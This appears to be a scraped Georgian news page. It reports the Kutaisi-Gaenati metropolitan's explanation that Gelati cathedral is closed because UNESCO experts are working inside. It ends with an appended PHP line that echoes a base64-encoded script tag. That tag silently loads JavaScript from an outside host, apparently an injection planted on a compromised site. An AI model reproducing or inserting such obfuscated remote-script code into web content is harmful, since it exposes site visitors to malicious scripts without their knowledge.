celsiusi
ავერსი შნაიდერი
ქუთაის-გაენათის ეპარქიის მიტროპოლიტმა, მეუფე იოანე გამრეკელმა გელათის ტაძართან დაკავშირებით განაცხადა, რომ მათი ინტერესია, სწორი დიაგნოზი დაისვას და სწორი მკურნალობა დაინიშნოს.
 
ჟურნალისტების მიერ დასმულ კითხვაზე ტაძრის დაკეტვასთან დაკავშირებით, მეუფემ აღნიშნა,რომ ტაძარში "იუნესკოს" ექსპერტები მუშაობენ და იქ მედიის ყოფნით ხელი ეშლებათ.
 
"თქვენ ხომ კარგად იცით, რატომ არის დაკეტილი და რატომ მეკითხებით? ჩემზე კარგად იცით ყველაფერი. "იუნესკოს" ექსპერტები არიან ჩამოსული და თქვენ ხელს უშლით მუშაობაში, ამიტომ დაკეტილია. თქვენს გამო დაიკეტა, მოუსვენარი ხალხი ხართ. მრევლს ლოცვის და წირვის საშუალება აქვს. მრევლი არ ზარალობს ამით. პირიქით, ჩვენი ინტერესია, სწორი დიაგნოზი დაისვას და სწორი მკურნალობა დაინიშნოს. გითხარით თუ "იუნესკოს" ექსპერტები უძლური არიან, თქვენ ვერ უშველით ვერაფერს" , - განაცხადა მეუფე იოანემ.
 
1139
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");